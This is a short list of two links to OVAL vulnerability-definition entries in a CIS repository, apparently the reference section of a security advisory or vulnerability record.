- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A2163
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A567